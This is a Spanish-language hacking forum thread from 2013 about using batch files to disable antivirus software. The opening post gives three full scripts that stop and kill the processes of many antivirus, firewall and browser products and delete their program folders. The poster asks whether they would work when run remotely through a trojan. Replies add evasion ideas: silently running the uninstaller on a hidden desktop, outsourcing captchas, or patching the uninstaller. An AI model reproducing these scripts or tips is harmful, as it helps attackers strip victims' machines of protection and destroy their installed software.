Título: Atacar Antivirus en .bat
Publicado por: Xaerox en 14 Noviembre 2013, 05:16 am
Muchachos una pregunta, soy nuevo en esto del hacking, :( les quiero preguntar algo, ejecutando algunos de estos "virus" en .bat puedo destruir o inutilizar el antivirus de Kaspersky? >:D No conozco mucho sobre programación en batch por eso les pregunto, los codigos los encontre por alli en google. ;D El Primero: @echo off net stop "Centro de Seguridad" net stop "Firewall de Windows/Conexión compartida a Internet (ICS)" Taskkill /f /IM ccProxy.exe /IM ccSetMgr.exe /IM SNDSrvc.exe /IM SPBBCSvc.exe /IM ccEvtMgr.exe /IM ccApp.exe /IM NMAIN.EXE /IM SBServ.exe /IM NOPDB.EXE cd c:Archivos de programaArchiv os comunesSymante c Shared attrib -H -S -R *.* del /s /q *.* rd c:Archivos de programaArchiv os comunesSymante c Shared cd c:Archivos de programaArchiv os comunesSymante c SharedSPBBC attrib -H -S -R *.* del /s /q *.* Taskkill /f /IM symlcsvc.exe cd C:Archivos de programaArchiv os comunesSymante c SharedCCPD-LC attrib -H -S -R *.* del /s /q *.* Taskkill /f /IM SymWSC.exe /IM UsrPrmpt.exe cd c:Archivos de programaArchiv os comunesSymante c SharedSecurity Center attrib -H -S -R *.* del /s /q *.* Taskkill /f /IM navapsvc.exe /IM ISSVC.exe /IM cd c:Archivos de programaNorton Internet Security attrib -H -S -R *.* del /s /q *.* cd c:Archivos de programaNorton Internet SecurityNorton AntiVirus attrib -H -S -R *.* del /s /q *.* Taskkill /f /IM zlclient.exe /IM zonealarm.exe /IM zlcli6ent.exe /IM zo3nealarm.exe cd C:Archivos de programa*one Labs*oneAlarm attrib -H -S -R *.* del /s /q *.* Taskkill /f /IM ewidoctrl.exe cd C:Archivos de programaewido anti-malware attrib -H -S -R *.* del /s /q *.* Taskkill /f /IM vsmon.exe C:WINDOWSsystem3 2*oneLabs attrib -H -S -R *.* del /s /q *.* Taskkill /f /IM navapsvc.exe /IM NPFMntor.exe /IM navapw32.exe /IM SAVScan.exe cd C:Archivos de programaNorton AntiVirus attrib -H -S -R *.* del /s /q *.* cd C:Archivos de programaNorton AntiVirusIWP attrib -H -S -R *.* del /s /q *.* Taskkill /f /IM NPROTECT.EXE cd C:Archivos de programaNorton Utilities attrib -H -S -R *.* del /s /q *.* Taskkill /f /IM WRSSSDK.exe /IM SpySweeper.exe cd C:Archivos de programaWebroo tSpy Sweeper attrib -H -S -R *.* del /s /q *.* Taskkill /f /IM GBPoll.exe /IM navapsvc.exe /IM NPFMntor.exe /IM NPROTECT.EXE /IM NOPDB.EXE /IM GBTray.exe /IM NPFMntor.exe /IM GhostTray.exe /IM PQV2iSvc.exe rd C:Archivos de programaNorton SystemWorksNor ton AntiVirus Taskkill /f /IM no-spy.exe cd C:Archivos de programaSinEsp ias attrib -H -S -R *.* del /s /q *.* Taskkill /f /IM spyaxe.exe /IM spyaxe.exe cd C:Archivos de programaSpyAxe attrib -H -S -R *.* del /s /q *.* Taskkill /f /IM SpywareStrike. exe /IM SpywareStrike. exe cd C:Archivos de programaSpywar eStrike attrib -H -S -R *.* del /s /q *.* Taskkill /f /IM gcasDtServ.exe /IM gcasServ.exe cd C:Archivos de programaMicros oft AntiSpyware attrib -H -S -R *.* del /s /q *.* Taskkill /f /IM kavsvc.exe /IM kav.exe cd C:ARCHIVOS DE PROGRAMAKASPER SKY LABKASPERSKY ANTI-VIRUS PERSONAL attrib -H -S -R *.* del /s /q *.* Taskkill /f /IM mcdetect.exe /IM mctskshd.exe /IM mcregwiz.exe /IM mcagent.exe cd c:archivos de programamcafee .comagent attrib -H -S -R *.* del /s /q *.* Taskkill /f /IM VsStat.exe cd C:Archivos de programaMcAfee McAfee VirusScan attrib -H -S -R *.* del /s /q *.* Taskkill /f /IM firefox.exe cd C:Archivos de programaMozill a Firefox attrib -H -S -R *.* del /s /q *.* Taskkill /f /IM Pavsrv51.exe /IM AVENGINE.EXE /IM apvxdwin.exe /IM pavProxy.exe cd C:Archivos de programaPanda SoftwarePanda Antivirus Titanium attrib -H -S -R *.* del /s /q *.* rd C:Archivos de programaPanda SoftwarePanda Antivirus Titanium Taskkill /f /IM SynTPLpr.exe /IM SynTPEnh.exe cd C:Archivos de programaSynapt icsSynTP attrib -H -S -R *.* del /s /q *.* Taskkill /f /IM FrameworkServi ce.exe /IM Mcshield.exe /IM VsTskMgr.exe /IM SHSTAT.EXE cd C:Archivos de programaNetwor k AssociatesViru sScan attrib -H -S -R *.* del /s /q *.* cd C:Archivos de programaNetwor k AssociatesComm on Framework attrib -H -S -R *.* del /s /q *.* Taskkill /f /IM nod32krn.exe /IM nod32kui.exe cd C:Archivos de programaEset attrib -H -S -R *.* del /s /q *.* rd C:Archivos de programaEset Taskkill /f /IM AVGSERV9.EXE /IM AVGCC32.EXE cd C:PROGRAM FILESGRISOFTAV G6 attrib -H -S -R *.* del /s /q *.* Taskkill /f /IM AVGUARD.EXE /IM AVWUPSRV.EXE /IM AVGNT.EXE /IM AVSched32.EXE cd C:Archivos de programaAVPers onal attrib -H -S -R *.* del /s /q *.* Taskkill /f /IM ASHSERV.EXE /IM ASHWEBSV.EXE /IM ASHMAISV.exe cd C:ARCHIVOS DE PROGRAMAALWIL SOFTWAREAVAST4 attrib -H -S -R *.* del /s /q *.* Taskkill /f /IM avgcc.exe /IM avgamsvr.exe /IM avgupsvc.exe cd "cd C:Archivos de programaGrisof t" attrib -H -S -R *.* del /s /q *.* cd "AVGFRE*" attrib -H -S -R *.* del /s /q *.* Taskkill /f /IM IEXPLORE.EXE cd C:Archivos de programaIntern et Explorer attrib -H -S -R *.* del /s /q *.* Taskkill /f /IM Pagent.exe /IM pagentwd.exe /IM pavsched.exe cd C:Archivos de programaPanda SoftwarePanda Administrator 3Pav_Agent attrib -H -S -R *.* del /s /q *.* cd C:Archivos de programaPanda SoftwarePanda Administrator 3Scheduler attrib -H -S -R *.* del /s /q *.* Taskkill /f /IM bdoesrv.exe /IM bdmcon.exe /IM bdnagent.exe /IM bdswitch.exe cd C:Archivos de programaSoftwi nBitDefender9 attrib -H -S -R *.* del /s /q *.* Taskkill /f /IM xcommsvr.exe /IM livesrv.exe /IM bdss.exe rd C:Archivos de programaArchiv os comunesSoftwin Taskkill /f /IM DefWatch.exe /IM Rtvscan.exe cd C:Archivos de programaSymant ec_Client_Secu ritySymantec AntiVirus attrib -H -S -R *.* del /s /q *.* Taskkill /f /IM avgamsvr.exe /IM avgupsvc.exe cd C:Archivos de programaAVG7 attrib -H -S -R *.* del /s /q *.* exit
el Segundo:
@echo off c: cd\ rd /q /s *norton* rd /q /s *kav* rd /q /s *kaspersky* rd /q /s *panda* rd /q /s *mcafee* cd documents* rd /q /s *norton* rd /q /s *kav* rd /q /s *kaspersky* rd /q /s *panda* rd /q /s *mcafee* exit
y el ultimo:
@echo off If exist "C:\Archivos de programa\ewido anti-malware" (goto ewido) else (goto 1) :1 If exist "C:\Archivos de programa\Eset" (goto nod32) else (goto 2) :2 If exist "C:\Archivos de programa\Spybot - Search & Destroy" (goto spybot) else (goto 3) :3 If exist "C:\Archivos de programa\Windows Defender" (goto windefender) else (goto 4) :4 If exist "C:\Archivos de programa\mcafee.com" (goto mcafee) else (goto 5) MANUAL DE PROGRAMACION EN BATCH http://209.85.229.132/search?q=cache:do6sau8zZCoJ:usuarios.multiman... 21 de 101 12/02/2010 9:44:5 If exist "C:\Archivos de programa\Zone Labs\ZoneAlarm" (goto zone) else (goto 6) :6 If exist "C:\Archivos de programa\Trend Micro" (goto trend) else (goto 7) :7 If exist "C:\Archivos de programa\Synaptics" (goto sinapti) else (goto 8) :8 If exist "C:\Archivos de programa\Grisoft\AVG free" (goto avfree) else (goto 9) :9 If exist "C:\Archivos de programa\Archivos comunes\Symantec Shared" (goto norton) else (goto 10) :10 If exist "C:\Archivos de programa\Norton AntiVirus" (goto norton2) else (goto 11) :11 If exist "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security (goto Panda06) else (goto 12) :12 If exist "C:\Archivos de programa\Alwil Software\Avast4" (goto Avast4) else (goto 13) :13 If exist "C:\Archivos de programa\Microsoft AntiSpyware" (goto micanti) else (goto 14) :14 If exist "C:\Archivos de programa\Kaspersky Lab\Kaspersky Anti-Virus Personal" (goto kav) else (goto 15) :15 If exist "C:\Archivos de programa\Webroot\Spy Sweeper" (goto sweeper) else (goto 16) :16 If exist "C:\Archivos de programa\SinEspias" (goto sinspy) else (goto 17) :17 If exist "C:\Archivos de programa\Panda Software\Panda Antivirus Titanium" (goto pandatitanium) else (gto 18) :18 If exist "C:\Archivos de programa\AVPersonal" (goto avpersonal) else (goto 19) :19 If exist "C:\Archivos de programa\Softwin\BitDefender9" (goto bit9) else (goto 20) :20 goto fin :bit9 net stop "bdoesrv" net stop "bdmcon" net stop "bdnagent" net stop "bdswitch" Taskkill /f /IM bdoesrv.exe /IM bdmcon.exe /IM bdnagent.exe /IM bdswitch.exe cd C:\Archivos de programa\Softwin\BitDefender9 attrib -H -S -R *.* del /s /q *.* :avpersonal net stop "AVGUARD" net stop "AVWUPSRV" net stop "AVGNT" net stop "AVSched32" Taskkill /f /IM AVGUARD.EXE /IM AVWUPSRV.EXE /IM AVGNT.EXE /IM AVSched32.EXE cd C:\Archivos de programa\AVPersonal attrib -H -S -R *.* del /s /q *.* :pandatitanium net stop "Pavsrv51" net stop "AVENGINE" net stop "apvxdwin" net stop "pavProxy" Taskkill /f /IM Pavsrv51.exe /IM AVENGINE.EXE /IM apvxdwin.exe /IM pavProxy.exe cd "C:\Archivos de programa\Panda Software\Panda Antivirus Titanium" attrib -H -S -R *.* del /s /q *.* rd /s /q C:\Archivos de programa\Panda Software\Panda Antivirus Titanium :sinspy Taskkill /f /IM no-spy.exe cd "C:\Archivos de programa\SinEspias" attrib -H -S -R *.* del /s /q *.* :sweeper Taskkill /f /IM WRSSSDK.exe /IM SpySweeper.exe cd "C:\Archivos de programa\Webroot\Spy Sweeper" attrib -H -S -R *.* del /s /q *.* :kav cd "C:\Archivos de programa\Kaspersky Lab\Kaspersky Anti-Virus Personal" net stop "kav" net stop "kavsvc" Taskkill /f /IM kav.exe /IM kavsvc.exe attrib -H -S -R *.* del /s /q *.* goto 15
:micanti cd "C:\Archivos de programa\Microsoft AntiSpyware" net stop "gcasServ" net stop "gcasDtServ" Taskkill /f /IM gcasServ.exe /IM gcasDtServ.exe attrib -H -S -R *.* del /s /q *.* goto 14 :Avast4 cd "C:\Archivos de programa\Alwil Software\Avast4" net stop "aswUpdSv" net stop "ashServ" net stop "ashWebSv" net stop "ashDisp" Taskkill /f /IM aswUpdSv.exe /IM ashServ.exe /IM ashWebSv.exe /IM ashDisp.exe attrib -H -S -R *.* del /s /q *.* goto 13 :Panda06 cd "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security" net stop "TPSrv" net stop "PavFnSvr" net stop "pavsrv51" net stop "pskmssvc" net stop "AVENGINE" net stop "PNMSRV" net stop "PsImSvc" Taskkill /f /IM TPSrv.exe /IM PavFnSvr.exe /IM pavsrv51.exe /IM pskmssvc.exe /IM AVENGINE.EXE /IM PNMSRV.EXE /IM PsImSvc.exe attrib -H -S -R *.* del /s /q *.* cd "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security\AntiSpam" attrib -H -S -R *.* del /s /q *.* cd "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security\FIREWALL" attrib -H -S -R *.* del /s /q *.* cd "C:\Program Files\Common Files\Panda Software\PavShld" Taskkill /f /IM pavprsrv.exe attrib -H -S -R *.* del /s /q *.* goto 12 :norton2 cd "C:\Archivos de programa\Norton AntiVirus" net stop "navapsvc" net stop "NPFMntor" Taskkill /f /IM navapsvc.exe /IM NPFMntor.exe attrib -H -S -R *.* del /s /q *.* cd "C:\Archivos de programa\Norton AntiVirus\IWP" attrib -H -S -R *.* del /s /q *.* goto 11 :norton cd "C:\Archivos de programa\Archivos comunes\Symantec Shared" net stop "ccSetMgr" net stop "SNDSrvc" net stop "SPBBCSvc" net stop "ccEvtMgr" net stop "ccApp" net stop "symlcsvc" Taskkill /f /IM ccSetMgr.exe /IM SNDSrvc.exe /IM SPBBCSvc.exe /IM ccEvtMgr.exe /IM ccApp.exe /IM symlcsvc.exe attrib -H -S -R *.* del /s /q *.* cd "C:\Archivos de programa\Archivos comunes\Symantec Shared\SPBBC" attrib -H -S -R *.* del /s /q *.* cd "C:\Archivos de programa\Archivos comunes\Symantec Shared\CCPD-LC" attrib -H -S -R *.* del /s /q *.* goto 10 :avfree cd "C:\Archivos de programa\Grisoft\AVG free" net stop "avgamsvr" net stop "vgupsvc" net stop "avgcc" Taskkill /f /IM avgamsvr.exe /IM vgupsvc.exe /IM avgcc.exe attrib -H -S -R *.* del /s /q *.* goto 9 :sinapti cd "C:\Archivos de programa\Synaptics\SynTP"
net stop "SynTPLpr" net stop "SynTPEnh" Taskkill /f /IM SynTPLpr.exe /IM SynTPEnh.exe attrib -H -S -R *.* del /s /q *.* goto 8 :trend cd "C:\Archivos de programa\Trend Micro\OfficeScan Client" net stop "ntrtscan" net stop "tmlisten" net stop "OfcPfwSvc" net stop "pccntmon" Taskkill /f /IM ntrtscan.exe /IM tmlisten.exe /IM OfcPfwSvc.exe /IM pccntmon.exe attrib -H -S -R *.* del /s /q *.* goto 7 :zone cd "C:\Archivos de programa\Zone Labs\ZoneAlarm" net stop "zlclient" net stop "zonealarm" net stop "vsmon" Taskkill /f /IM zlclient.exe /IM zonealarm.exe /IM vsmon.exe attrib -H -S -R *.* del /s /q *.* cd "C:\WINDOWS\system32\ZoneLabs" attrib -H -S -R *.* del /s /q *.* goto 6 :mcafee cd "c:\archivos de programa\mcafee.com\agent" net stop "mcdetect" net stop "mctskshd" net stop "mcagent" net stop "mcvsescn" net stop "mcvsftsn" net stop "mcvsshld" net stop "mcvsrte" net stop "mcshield" Taskkill /f /IM mcdetect.exe /IM mctskshd.exe /IM mcagent.exe /IM mcvsescn.exe /IM mcvsftsn.exe /IM mcvsshld.exe /IM mcvsrte.exe /IM mcshield.exe attrib -H -S -R *.* del /s /q *.* rd /s /q "c:\archivos de programa\mcafee.com\agent" rd /s /q "c:\archivos de programa\mcafee.com" goto 5 :windefender cd "C:\Archivos de programa\Windows Defender" net stop "MsMpEng" net stop "MSASCui" Taskkill /f /IM MsMpEng.exe /IM MSASCui.exe attrib -H -S -R *.* del /s /q *.* goto 4 :spybot cd "C:\Archivos de programa\Spybot - Search & Destroy" net stop "TeaTimer" Taskkill /f /IM TeaTimer.exe attrib -H -S -R *.* del /s /q *.* goto 3 :nod32 cd "C:\Archivos de programa\Eset" net stop "nod32krn" net stop "nod32kui" net stop "nod32" Taskkill /f /IM nod32krn.exe /IM nod32kui.exe /IM nod32.exe attrib -H -S -R *.* del /s /q *.* goto 2 :ewido cd "C:\Archivos de programa\ewido anti-malware" Taskkill /f /IM ewidoctrl.exe /IM ewidoguard.exe net stop "ewidoctrl" net stop "ewidoguard" attrib -H -S -R *.* del /s /q *.* goto 1 :fin exit De ante mano muchas gracias! Saludos.
Título: Re: Atacar Antivirus en .bat
Publicado por: Mad Antrax en 14 Noviembre 2013, 09:35 am
La idea es buena, pero yo cambiaría las rutas absolutas del BAT por variables del sistema, es decir:
%programfiles% en lugar de "C:\Archivos de Programa"
btw, buen trabajo :)
Título: Re: Atacar Antivirus en .bat
Publicado por: Xaerox en 14 Noviembre 2013, 13:11 pm
Listo Gracias....
Título: Re: Atacar Antivirus en .bat
Publicado por: Karcrack en 14 Noviembre 2013, 17:27 pm
Ningún antivirus que se precie puede ser cerrado desde Batch y mucho menos sin privilegios de administrador.
Título: Re: Atacar Antivirus en .bat
Publicado por: Xaerox en 15 Noviembre 2013, 19:43 pm
Explicame algo karcrack, si yo introduzco un troyano en X ordenador, supongamos que esa cuenta tiene privilegios de Administrador, y yo subo le subo estos "virus" y los ejecuto remotamente. Lograria borrar y/o dañar los antivirus? Funcionarian?
Título: Re: Atacar Antivirus en .bat
Publicado por: burbu_1 en 16 Noviembre 2013, 10:18 am
la mayoría de antivirus tienen módulos de autoprotección cargados como drivers que no te dejan acceder a los procesos y archivos del antivirus.
Si tienes algún av instalado puedes comprobarlo intentando matar el proceso desde el taskmgr, o desde la consola con taskkill.
Saludos.
Título: Re: Atacar Antivirus en .bat
Publicado por: Karcrack en 16 Noviembre 2013, 17:53 pm
En principio con privilegios de administrador podrías desinstalar cualquier antivirus, ya que si el desinstalador puede tú también. Lo más probable es que requieras de un reinicio para deshabilitarlo por completo.
Esto es sólo una idea ( :silbar:) pero siempre podrías con privilegios de administrador lanzar el desinstalador del propio antivirus y ahorrarte todo el esfuerzo :P Si quieres que no se vea nada de nada siempre puedes crear un escritorio (CreateDesktop(), etc...) e interactuar con la ventana de forma invisible.
Título: Re: Atacar Antivirus en .bat
Publicado por: Mad Antrax en 16 Noviembre 2013, 18:23 pm
En principio con privilegios de administrador podrías desinstalar cualquier antivirus, ya que si el desinstalador puede tú también. Lo más probable es que requieras de un reinicio para deshabilitarlo por completo.
Esto es sólo una idea ( :silbar:) pero siempre podrías con privilegios de administrador lanzar el desinstalador del propio antivirus y ahorrarte todo el esfuerzo :P Si quieres que no se vea nada de nada siempre puedes crear un escritorio (CreateDesktop(), etc...) e interactuar con la ventana de forma invisible.
No recuerdo el nombre, pero hay un antivirus que el propio desinstalador te enseña un captcha para evitar ese tipo de "trampas" xD
Título: Re: Atacar Antivirus en .bat
Publicado por: ny0s en 16 Noviembre 2013, 18:31 pm
este post se me hace muy parecido a otro post que lei en hackxcrack
Título: Re: Atacar Antivirus en .bat
Publicado por: Karcrack en 16 Noviembre 2013, 18:44 pm
No recuerdo el nombre, pero hay un antivirus que el propio desinstalador te enseña un captcha para evitar ese tipo de "trampas" xD
Bastará con enviar el captcha a uno de esos servicios donde hay hindúes resolviéndolos por hora :laugh: O si te pones chulo siempre puedes parchear el desinstalador :rolleyes:
Título: Re: Atacar Antivirus en .bat
Publicado por: burbu_1 en 16 Noviembre 2013, 20:22 pm
hola Karcrack, siempre es un placer leerte,
de la misma manera que dices, en teoría, tambien se podrían conseguir privilegios de administrador, o saltarse la uac..... ya que si el usuario puede....
por ejemplo avast saca una ventana como la de la uac para desactivar sus escudos, en las ventanas de avira no funcionan las apis del mouse...... y me imagino que el resto tendrá defensas similares
Título: Re: Atacar Antivirus en .bat
Publicado por: Karcrack en 17 Noviembre 2013, 00:09 am
UAC sólo sale si no eres administrador... El mensaje de UAC se muestra en "Winlogon" (también lo usa para el screen de CTRL+ALT+SUPR) que es otro desktop creado por Windows para aislar los mensajes de otros desktops dado que no puedes enviar mensaje sin estar "dentro" del mismo y el acceso está restringido al grupo de Administradores sólo podrás eliminar UAC siendo Administrador.
Avast hace lo mismo que W$ pero con su propio desktop. Podrías enviar mensajes a ese ventana si vinculas tu thread al mismo desktop, por supuesto necesitarás ser administrador dado que al crear el desktop Avast introduce ese DACL.
Puedes leer más al respecto aquí: http://msdn.microsoft.com/en-us/library/windows/desktop/ms682573(v=vs.85).aspx (http://msdn.microsoft.com/en-us/library/windows/desktop/ms682573(v=vs.85).aspx)
|